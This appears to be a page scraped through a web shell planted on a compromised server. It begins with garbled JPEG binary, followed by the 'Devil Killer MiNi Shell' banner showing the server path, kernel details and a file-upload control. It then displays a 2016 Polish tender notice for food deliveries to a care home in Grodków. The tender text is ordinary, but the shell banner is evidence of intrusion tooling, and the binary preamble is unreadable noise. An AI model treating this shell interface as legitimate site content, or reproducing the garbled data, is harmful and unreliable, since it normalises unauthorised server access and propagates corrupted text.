JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161117/344907-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.dpsjedrzejow.org' target='_blank'>http://www.bip.dpsjedrzejow.org</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 344907 - 2016
              z dnia 2016-11-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Grodków: Sukcesywne dostawy artykułów spożywczych
dla Domu Pomocy Społecznej w Jędrzejowie w roku 2017 (artykuły sypkie, nabiał, warzywa                 i owoce, pieczywo)
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>nie dotyczy<br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b>nie dotyczy<br /><b>Informacje dodatkowe:</b>nie dotyczy<br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Dom Pomocy Społecznej, krajowy numer identyfikacyjny
              30471100000, ul.
              Jędrzejów 
              16,
              49200  
              Grodków, woj.
              opolskie, państwo
              Polska, tel.
              77 415 80 15, e-mail
              , faks
              77 415 80 15.
              <br />
              Adres strony internetowej (URL): http://www.bip.dpsjedrzejow.org<br />
                Adres profilu nabywcy:

                nie dotyczy<br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                nie dotyczy</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />nie dotyczy</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.bip.dpsjedrzejow.org</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />za pośrednictwem operatora pocztowego, osobiscie, za pośrednictwem posłańca<br />
                Adres:
                <br />Dom Pomocy Społecznej , Jędrzejów 16, 49-200 Grodków</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Sukcesywne dostawy artykułów spożywczych
dla Domu Pomocy Społecznej w Jędrzejowie w roku 2017 (artykuły sypkie, nabiał, warzywa                 i owoce, pieczywo)
<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />4<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	   Przedmiot zamówienia stanowią sukcesywne dostawy artykułów spożywczych  dla Domu Pomocy Społecznej w Jędrzejowie w roku 2017 zgodnie  z  warunkami  wynikającymi z obowiązujących przepisów, w szczególności rozporządzenia   (WE) nr 852/2004    Parlamentu     Europejskiego i  Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. Urz. UE L139 z dnia 30.04.2004r.),  rozporządzenia   (WE)    nr 853/2004   Parlamentu   Europejskiego i Rady z dnia 29 kwietnia  2004 r.   ustanawiającym   szczególne    przepisy    dotyczące    higieny w  odniesieniu   do  żywności   pochodzenia    zwierzęcego   (Dz. Urz. UE L 139 z 30.04.2004) oraz ustawy z dnia 25 sierpnia 2006 r. o  bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz. 594)  
2.	 	Przedmiot zamówienia podzielony został odpowiednio na 4  części, zgodnie z załącznikami nr 1A  1D   które stanowią załączniki do oferty i integralną część SIWZ.
3.	  Dopuszcza się składanie ofert częściowych. Wykonawca może złożyć w postępowaniu wyłącznie jedną ofertę na jedną lub kilka części zamówienia.
4.	  Przez sukcesywną dostawę należy rozumieć cykliczną sprzedaż i dostawę artykułów spożywczych na podstawie zamówień dostosowanych do aktualnych potrzeb, składanych pisemnie (faksem, drogą elektroniczną)  przez pracownika DPS.
5.	  Wykonawca zobowiązany będzie dostarczyć zamówione produkty na własny koszt i ryzyko w miejsce wskazane przez Zamawiającego. W szczególności Wykonawca zobowiązany będzie zapewnić dostawę, rozładunek  i wniesienie dostarczonego asortymentu do pomieszczeń wskazanych przez pracownika Zamawiającego.
6.	   Odbiór artykułów spożywczych odbywać się będzie w siedzibie Zamawiającego po każdorazowym stwierdzeniu zgodności z zamówieniem, jakością i po podpisaniu przez obie strony dokumentu odbioru dostawy.
7.	   Produkty dostarczane nie mogą stwarzać żadnego niebezpieczeństwa zagrożenia zdrowia i życia mieszkańców Zamawiającego. Jeżeli zostaną ujawnione jakiekolwiek niebezpieczeństwa związane z uszkodzeniem produktu lub stwierdzeniem złej daty ważności do spożycia, stwierdzeniem cech popsucia produktu lub cech braku świeżości, Zamawiający wycofa produkt z dostawy a Wykonawca winien wadliwą partię wymienić na tożsame produkty wolne od wad na własny koszt. 
8.	  Zamawiający sprawdzi przedmiot zamówienia przy każdej dostawie i w razie stwierdzenia nieprawidłowości, zakwestionowania jakości towaru, nastąpi wymiana towaru na towar dobrej jakości w tym samym dniu. 
9.	  W przypadku braków asortymentowych Wykonawca niezwłocznie uzupełni brakujący towar.
10.	Wykonawca zapewnia, że dostarczane artykuły żywnościowe będą należytej jakości oraz że będą dostarczane w oryginalnych i nienaruszonych opakowaniach, nie później niż w połowie okresu przydatności do spożycia przewidzianego dla danego artykułu spożywczego. 
11.	Dostarczane produkty winny posiadać długi termin przydatności do spożycia zapewniający bezpieczne zużycie dostarczonych produktów a oznaczenie terminu ważności musi być czytelne. 
12.	Opakowania transportowe winny być nie naruszone.
13.	Zamawiający zastrzega sobie prawo niezrealizowania przedmiotu zamówienia w pełnej ilości artykułów określonych w formularzu cenowym.
14.	Podane ilości w formularzu cenowym stanowią wielkości szacunkowe. W przypadku zakupu przez Zamawiającego mniejszych ilości przedmiotu zamówienia Wykonawcy nie przysługują uprawnienia do dochodzenia jakichkolwiek roszczeń z tego tytułu. Zamawiający zastrzega sobie prawo dokonywania zmian ilości przedmiotu zamówienia w poszczególnych asortymentach stosownie do swoich potrzeb  a także do rezygnacji z niektórych pozycji.
15.	Wykonawca nie może bez zgody Zamawiającego dokonać zmiany rodzaju oferowanego produktu, który będzie objęty umową.
16.	Dostarczane produkty żywnościowe  w  zależności od ich kategorii muszą przy każdej   dostawie   posiadać  wszystkie   niezbędne  dokumenty  wymagane  przepisami  prawa   żywnościowego. 
17.	Jeżeli w opisie przedmiotu zamówienia zostały wskazane znaki towarowe, patenty lub pochodzenie przedmiotu zamówienia publicznego, w domyśle, wskazaniu takiemu każdorazowo towarzyszą wyrazy lub równoważny.  Zgodnie z art. 29 ust 3 ustawy prawo zamówień publicznych Zamawiający dopuszcza składanie ofert równoważnych i zastosowanie produktów równoważnych na cały asortyment stanowiący przedmiot zamówienia publicznego, tj. produktów innych producentów niż wymienione w SIWZ z zastrzeżeniem, by ich minimalne parametry jakościowe były co najmniej takie same jak parametry i cechy produktów wskazanych w opisie przedmiotu zamówienia publicznego.  Produkty równoważne mają mieć te same walory organoleptyczne - smak, zapach, barwę, estetykę, konsystencję.W przypadku zaoferowania asortymentu równoważnego, Wykonawca jest zobowiązany wykazać, że oferowany przez niego produkt spełnia wymagania określone przez Zamawiającego. Na potwierdzenie spełniania wymagań, Wykonawca przedłoży na żądanie Zamawiającego specyfikację produktu równoważnego oferowanego przez Wykonawcę, która ma zawierać wyszczególnione cechy charakterystyczne, potwierdzające zgodność oferowanego asortymentu z asortymentem opisanym przez Zamawiającego  (skład, wagę, gramaturę itp.). 
18.	UWAGA: Jeżeli zaoferowane artykuły będą posiadały parametry gorsze od wymaganych  w opisie przedmiotu zamówienia publicznego , Zamawiający odrzuci ofertę na podstawie art. 89 ust. 1 pkt  2 ustawy prawo zamówień publicznych. Ciężar udowodnienia, że zaoferowane przez Wykonawcę artykuły odpowiadają wymaganiom wskazanym przez Zamawiającego, spoczywa na Wykonawcy.

CPV)  Wspólny Słownik Zamówień 
część 1
Artykuły sypkie (mąka, makarony, przyprawy, jaja, dodatki itp.)
  kod  CPV 158 00000- 6 Różne produkty spożywcze


część 2
Nabiał (mleko i przetwory mleczne)  
  kod  CPV 155 00000-3 Produkty mleczarskie

Część 3
Warzywa i owoce przetworzone i nieprzetworzone
 kod  CPV 031 00000-2 Warzywa i owoce

Część 4
Pieczywo
15851000-8	Produkty mączne
15613000-8	Produkty z ziaren zbóż
<br /><br /><b>II.5) Główny kod CPV: </b>15800000-6<br /><b> Dodatkowe kody CPV:</b>15500000-3,
                03100000-2,
                15851000-8,
                15613000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2017<br /></div><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br />
                Informacje dodatkowe
                nie dotyczy<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br />
                Informacje dodatkowe
                nie dotyczy<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Dla części I zamówienia:
Warunek zostanie uznany za spełniony, jeżeli wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał należycie minimum  jedną dostawę będącą przedmiotem zamówienia tj. artykułów sypkich (mąki, makaronów, przypraw, jaja, dodatków itp.) o łącznej wartości co najmniej 40.000zł. brutto przez okres 12 m-cy.

Dla części II zamówienia:
Warunek zostanie uznany za spełniony, jeżeli wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał należycie minimum  jedną dostawę będącą przedmiotem zamówienia, tj. nabiału (mleka i przetworów mlecznych)  o łącznej wartości co najmniej 60.000zł. brutto przez okres 12 m-cy.

Dla części III zamówienia:
Warunek zostanie uznany za spełniony, jeżeli wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał należycie minimum  jedną dostawę będącą przedmiotem zamówienia, tj. warzyw i owoców (przetworzonych i nieprzetworzonych )  o łącznej wartości co najmniej 30.000zł. brutto przez okres 12 m-cy.

Dla części IV zamówienia:
Warunek zostanie uznany za spełniony, jeżeli wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał należycie minimum  jedną dostawę będącą przedmiotem zamówienia, tj. pieczywa  o łącznej wartości co najmniej 30.000zł. brutto przez okres 12 m-cy.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                Ocena spełnienia ww. warunków udziału w postępowaniu zostanie dokonana na podstawie przedłożonych przez Wykonawcę oświadczeń wg zasady spełnia/ nie spełnia.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
b)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c)	odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wskazanych w ppkt 2) a), b),c) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby.
W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów kraju, w którym miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)	wykazu dostaw lub usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />ne dotyczy</div><b>
